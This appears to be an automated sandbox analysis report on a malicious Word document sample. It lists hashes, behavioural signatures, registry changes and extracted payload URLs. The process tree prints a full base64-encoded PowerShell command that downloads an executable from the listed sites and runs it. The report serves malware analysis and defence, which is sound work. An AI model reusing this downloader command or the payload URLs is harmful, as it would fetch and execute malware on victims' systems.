Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29/09/2024, 16:27
Behavioral task
behavioral1
Sample
feea6e6b4e0b9f12e77467c31a2e12cb_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
feea6e6b4e0b9f12e77467c31a2e12cb_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
feea6e6b4e0b9f12e77467c31a2e12cb_JaffaCakes118.doc
-
Size
190KB
-
MD5
feea6e6b4e0b9f12e77467c31a2e12cb
-
SHA1
9eaa4b96f2aae733f57cc596ef453040d3bffb5d
-
SHA256
d09bf180c62ff076b690cc1ba7f1848bbcd7aca274fd1350df751593c3d06cfe
-
SHA512
d429fc0e68988ae293edff17cedaee5b9417a9c9595eda0f8836941fab6e19d772cbf9cedd351b7cc691805c8690c4ead1faf16aed14ed56d50b1930dae0c792
-
SSDEEP
3072:uvHv22TWTogk079THcpOu5UZHNu81zUz4LKdT:E/TX07hHcJQtuezUEL6T
Malware Config
Extracted
http://minershallmuseum.com/documents/D/
http://injazjordan.com/moodle/Vh/
https://site1.xyz/wp-admin/Y/
http://2bstone.com/vr7tf0c/ZD/
http://biology-360.com/wp-admin/hv/
http://tez-tour.site/wp-content/9sB/
http://iooe.cn/wp-content/hdO/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 860 2872 powershell.exe 30 -
Blocklisted process makes network request 5 IoCs
flow pid Process 3 860 powershell.exe 7 860 powershell.exe 8 860 powershell.exe 10 860 powershell.exe 14 860 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6937E86B-A372-4197-B445-FEDB67BC815B}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{6937E86B-A372-4197-B445-FEDB67BC815B}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{6937E86B-A372-4197-B445-FEDB67BC815B}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{6937E86B-A372-4197-B445-FEDB67BC815B}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{6937E86B-A372-4197-B445-FEDB67BC815B}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2344 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 860 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2344 WINWORD.EXE 2344 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2344 wrote to memory of 1624 2344 WINWORD.EXE 34 PID 2344 wrote to memory of 1624 2344 WINWORD.EXE 34 PID 2344 wrote to memory of 1624 2344 WINWORD.EXE 34 PID 2344 wrote to memory of 1624 2344 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\feea6e6b4e0b9f12e77467c31a2e12cb_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABaADUAbQA0AHEAYQBwAD0AKAAnAFoAJwArACcAaQAnACsAKAAnAHcAXwBrAHMAJwArACcANwAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAVQBzAGUAcgBwAFIAbwBGAGkATABlAFwAQQB4AG0AcgBIAEEAVABcAEoANQBjAGsAaQAxADkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQBSAEkAYABUAHkAcABgAFIATwBgAFQATwBDAG8AbAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzADEAJwArACcAMgAsACAAJwApACsAJwB0ACcAKwAoACcAbABzADEAJwArACcAMQAsACcAKQArACgAJwAgAHQAJwArACcAbABzACcAKQApADsAJABYAG4AOQB0ADYAagB5ACAAPQAgACgAJwBRACcAKwAnAHUAdwAnACsAKAAnADIAJwArACcAdQA0AHQAJwApACkAOwAkAEQAeAAwADUAMwBiAGcAPQAoACcATAAnACsAKAAnAHoAdABiACcAKwAnADgANwAyACcAKQApADsAJABJAHkAYgBtAHgANQBtAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AEEAeABtAHIAaABhAHQAewAnACsAJwAwAH0ASgA1AGMAawBpADEAJwArACcAOQB7ADAAJwArACcAfQAnACkALQBmAFsAQwBoAGEAUgBdADkAMgApACsAJABYAG4AOQB0ADYAagB5ACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQARgB5AHMAMABvAHQAZQA9ACgAJwBYACcAKwAoACcAMwAnACsAJwB5AHoAZQBoAHoAJwApACkAOwAkAEQAagB0AHgAcQByAG0APQAuACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAEIAQwBsAGkAZQBOAHQAOwAkAE4AbAB4AHQAbgBpAGEAPQAoACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAG0AaQBuAGUAJwArACcAcgBzAGgAJwArACcAYQBsACcAKQArACgAJwBsAG0AJwArACcAdQBzACcAKQArACgAJwBlACcAKwAnAHUAbQAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGQAbwAnACsAJwBjAHUAJwArACcAbQBlACcAKwAnAG4AdABzAC8ARAAnACkAKwAoACcALwAnACsAJwAqAGgAdAB0AHAAOgAvAC8AaQBuAGoAYQB6ACcAKwAnAGoAJwApACsAKAAnAG8AcgAnACsAJwBkACcAKQArACgAJwBhAG4AJwArACcALgBjAG8AJwApACsAJwBtACcAKwAnAC8AJwArACgAJwBtAG8AJwArACcAbwAnACkAKwAnAGQAbAAnACsAKAAnAGUAJwArACcALwBWAGgAJwArACcALwAqAGgAJwApACsAJwB0AHQAJwArACcAcABzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHMAJwArACcAaQAnACsAJwB0AGUAMQAuACcAKQArACgAJwB4ACcAKwAnAHkAegAnACkAKwAoACcALwB3AHAALQBhAGQAbQAnACsAJwBpAG4ALwBZAC8AKgBoACcAKwAnAHQAdABwADoAJwArACcALwAvADIAYgAnACsAJwBzACcAKQArACgAJwB0AG8AbgAnACsAJwBlAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AJwArACcAdgByACcAKQArACgAJwA3ACcAKwAnAHQAZgAnACkAKwAoACcAMABjACcAKwAnAC8AJwApACsAKAAnAFoAJwArACcARAAvACoAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwBiAGkAbwBsACcAKQArACgAJwBvAGcAeQAnACsAJwAtADMAJwApACsAKAAnADYAJwArACcAMAAuACcAKQArACgAJwBjAG8AbQAvACcAKwAnAHcAcAAtAGEAZABtAGkAbgAnACsAJwAvACcAKwAnAGgAdgAvACcAKwAnACoAaAB0AHQAcAA6ACcAKQArACgAJwAvAC8AJwArACcAdAAnACsAJwBlAHoALQB0AG8AdQByACcAKQArACgAJwAuAHMAaQB0ACcAKwAnAGUAJwArACcALwB3AHAALQAnACkAKwAoACcAYwBvAG4AdABlAG4AdAAvACcAKwAnADkAcwAnACsAJwBCAC8AKgBoAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAKAAnAC8ALwBpAG8AbwBlACcAKwAnAC4AYwBuAC8AdwAnACsAJwBwAC0AYwBvACcAKQArACcAbgB0ACcAKwAnAGUAJwArACgAJwBuACcAKwAnAHQALwAnACkAKwAoACcAaAAnACsAJwBkAE8ALwAnACkAKQAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGEAeAA0AGIAdgA4AD0AKAAnAEEAJwArACcAbwAnACsAKAAnAHUAdgAnACsAJwAwADYAbwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE8AawAyAHgAbgA3AGoAIABpAG4AIAAkAE4AbAB4AHQAbgBpAGEAKQB7AHQAcgB5AHsAJABEAGoAdAB4AHEAcgBtAC4AIgBEAG8AdwBuAGAATABvAGEAZABgAEYAaQBsAEUAIgAoACQATwBrADIAeABuADcAagAsACAAJABJAHkAYgBtAHgANQBtACkAOwAkAFYAdgBzADgAbAB1ADgAPQAoACcATgAnACsAKAAnAGQAOAAnACsAJwBhACcAKwAnAG4AcwBkACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAEkAeQBiAG0AeAA1AG0AKQAuACIATABgAEUAbgBHAFQAaAAiACAALQBnAGUAIAAyADQANAA2ADgAKQAgAHsALgAoACcASQBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJACcAKwAnAHQAZQBtACcAKQAoACQASQB5AGIAbQB4ADUAbQApADsAJABJADIAOABqADAAMAB4AD0AKAAnAE8AJwArACgAJwA5ACcAKwAnAGEAMAAnACkAKwAoACcAdAA3ACcAKwAnAGMAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkANwB0AHoANAA3ADMAPQAoACgAJwBBACcAKwAnAGoAOQB6ADgAJwApACsAJwB2AHQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAHYAeABkAHIAcwA2AD0AKAAoACcAVwBmADMAJwArACcAdwAnACkAKwAoACcAOAAnACsAJwB5AF8AJwApACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD513f8b0df22f0b01a55e70f39d1d63891
SHA1a9913abe5e288e1a5d8757c8a1c4e8c70a8a51ef
SHA2567f1605d047267966318ded19c544c5ec0847e5a85ef43dbb0cd76490b3c15dad
SHA512c076e8dfce27a96345fde3dc5f50beb9cb75df28370f874cddbdd66828842042349a14256d2d2afc759208f73919fb635e74f91126b8b77c6dfcc0e93639cef8